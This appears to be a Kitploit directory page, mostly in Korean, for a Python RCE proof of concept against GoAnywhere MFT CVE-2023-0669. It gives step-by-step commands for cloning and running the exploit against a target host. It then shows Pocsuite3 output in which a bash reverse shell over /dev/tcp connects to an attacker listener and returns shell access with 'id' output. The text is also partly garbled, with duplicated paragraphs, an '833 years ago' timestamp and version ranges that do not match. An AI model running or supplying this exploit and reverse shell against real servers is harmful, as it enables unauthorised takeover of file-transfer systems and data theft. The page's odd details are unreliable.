Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-0669 — GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet 역직렬화 취약점 Python RCE PoC(개념 증명) | Kitploit
도구/GitHubGitHub/avento/cve-2023-0669
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubavento/cve-2023-0669

CVE-2023-0669

GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet 역직렬화 취약점 Python RCE PoC(개념 증명)

저장소 보기
833년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-0669 GoAnywhere MFT 역직렬화 - Je Yiuwai의 블로그

CVE-2023-0669

CVE-2023-0669는 GoAnywhere MFT 역직렬화 취약점으로, 공격자가 제어하는 객체를 역직렬화하여 License Response Servlet에 사전 인증 명령 주입 취약점이 존재합니다. 공격자는 이 취약점을 이용하여 영향을 받는 시스템에서 임의 코드를 실행하여 시스템을 완전히 제어할 수 있습니다. 이 취약점은 7.1.2 이전 버전에 영향을 미치며 7.1.2는 포함되지 않습니다.

CVE-2023-0669는 GoAnywhere MFT 역직렬화 취약점으로, License Response Servlet에 사전 인증 명령 주입 취약점이 존재하여 공격자가 제어하는 객체를 역직렬화함으로써 영향을 받는 시스템에서 임의 코드를 실행할 수 있습니다. 이 취약점은 7.1.2 이전 버전에 영향을 미칩니다.

이 취약점은 엔터프라이즈 파일 전송 소프트웨어 GoAnywhere MFT의 보안에 심각한 위협을 가할 수 있습니다. 공격자는 이 취약점을 악용하여 민감한 데이터를 탈취하고, 데이터를 변조하며, 시스템을 손상시킬 수 있습니다. 따라서 사용자는 시스템 보안을 보호하기 위해 신속하게 조치를 취해야 합니다.

이 취약점은 엔터프라이즈 수준 파일 전송 소프트웨어인 GoAnywhere MFT의 보안에 심각한 위협이 됩니다. 공격자가 이를 악용하여 민감한 데이터를 탈취하고, 데이터를 변조하며, 시스템을 손상시킬 수 있습니다. 따라서 사용자는 시스템을 보호하기 위해 적시에 조치를 취해야 합니다.

공식 보안 권고가 발표되었으며, 사전 점검 방법이 제공되었습니다. 사용자는 userdata/logs 로그에서 특정 문자열이 나타나는지 확인하여 시스템이 이 취약점의 영향을 받는지 확인할 수 있습니다. 패치를 적용할 수 없는 경우 시스템 보안을 위해 다른 보안 조치를 취하는 것이 좋습니다.

공식 보안 권고가 발표되었으며, 예비 점검 방법이 제공되었습니다. 사용자는 userdata/logs 로그에서 특정 문자열을 찾아 시스템이 취약점의 영향을 받는지 확인할 수 있습니다. 패치를 적용할 수 없는 경우 시스템을 보호하기 위해 다른 보안 조치를 취하는 것이 좋습니다.

요약하자면, CVE-2023-0669는 사용자의 주의가 필요한 역직렬화 취약점입니다. 사용자는 최신 버전으로 신속히 업데이트하고 시스템이 이 취약점의 영향을 받는지 확인해야 합니다. 또한 GoAnywhere MFT와 같은 엔터프라이즈 소프트웨어의 보안 관리를 강화하고 다층적인 보안 조치를 통해 시스템을 보호하는 것이 좋습니다.

요약하자면, CVE-2023-0669는 사용자의 주의가 필요한 역직렬화 취약점입니다. 사용자는 최신 버전으로 신속히 업데이트하고 시스템이 취약점의 영향을 받는지 확인해야 합니다. 또한 GoAnywhere MFT와 같은 엔터프라이즈 소프트웨어의 보안 관리를 강화하고 다층적인 보안 조치를 통해 시스템을 보호하는 것이 좋습니다.

CVE-2023-0669 PoC

소개

이 Exploit은 GoAnywhere MFT v6.7.9594 및 이전 버전의 취약점 CVE-2023-0669를 악용하는 Python 스크립트입니다.

소개

This Exploit is a Python script used to exploit the vulnerability CVE-2023-0669 in GoAnywhere MFT v6.7.9594 and earlier versions.

취약점 설명

이 취약점은 GoAnywhere MFT에서 암호화된 Bundle 요청을 처리할 때 보안 문제로 인해 발생합니다. 공격자는 특수하게 조작된 요청을 보내 대상 서버에서 임의 코드를 실행할 수 있습니다.

취약점 설명

This vulnerability exists because of a security issue in processing encrypted Bundle requests in GoAnywhere MFT. An attacker can send a specially crafted request to execute arbitrary code on the target server.

사용 방법

  1. 이 저장소를 클론합니다.
root@kitploit:~
git clone https://github.com/Avento/CVE-2023-0669.git
  1. 디렉토리로 이동합니다.
root@kitploit:~
cd CVE-2023-0669
  1. requests와 cryptography 의존성을 설치합니다.
root@kitploit:~
pip install requests cryptography
  1. Exploit을 실행합니다.
root@kitploit:~
python CVE-2023-0669.py --host <target IP>

Usage

  1. Clone this repository.
root@kitploit:~
git clone https://github.com/Avento/CVE-2023-0669.git
  1. Enter the directory.
root@kitploit:~
cd CVE-2023-0669
  1. Install the dependencies of requests and cryptography.
root@kitploit:~
pip install requests cryptography
  1. Run the Exploit.
root@kitploit:~
python CVE-2023-0669.py --host <target IP>

주의사항

  • 이 Exploit을 실행하려면 합법적인 접근 권한이 필요하며, 불법적인 목적으로 사용해서는 안 됩니다.
  • 이 Exploit의 실행은 대상 서버에 위험을 초래할 수 있으므로, 사용자는 그 위험과 결과에 대해 전적으로 책임을 져야 합니다.

Note

  • Running this Exploit requires legal access rights and should not be used for illegal purposes.
  • As the execution of this Exploit poses a risk to the target server, the user is solely responsible for its risks and consequences.

RCE

root@kitploit:~
$ python3 CVE-2023-0669.py --host 192.168.47.179:8000
Exploit Success ~

Pocsuite3

root@kitploit:~
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > check
[11:10:53] [INFO] pocsusite got a total of 1 tasks
[11:10:53] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
[11:10:53] [+] Version : 7.0.3
[11:10:53] [INFO] Scan completed,ready to print

+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
| target-url                 |                           poc-name                           |     poc-id    |   component    |         version          |  status |
----------+---------+
| http://192.168.47.179:8000 | CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 역직렬화 | CVE-2023-0669 | GoAnywhere MFT | 7.1.2 이전, 7.1.2 포함되지 않음 | success |
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
success : 1 / 1
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > shell
[11:11:55] [INFO] pocsusite got a total of 1 tasks
[11:11:55] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
/bin/bash -c bash$IFS-i$IFS>&$IFS/dev/tcp/192.168.47.1/6666<&1
[11:11:55] [*] listening on 0.0.0.0:6666
[11:11:56] [+] new connection established from 192.168.47.179
[11:11:56] [INFO] Scan completed,ready to print
[11:11:56] [INFO] connect back ip: 192.168.47.1    port: 6666
[11:11:56] [INFO] watting for shell connect to pocsuite
Now Connected: 192.168.47.179
SHELL (192.168.47.179) > id
bash: cannot set terminal process group (20029): Inappropriate ioctl for device
bash: no job control in this shell
ubuntu@ubuntu:~/HelpSystems/GoAnywhere$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)

작성자: Je Yiuwai, xiaomi pad 6 pro로 편집함

도구 다운로드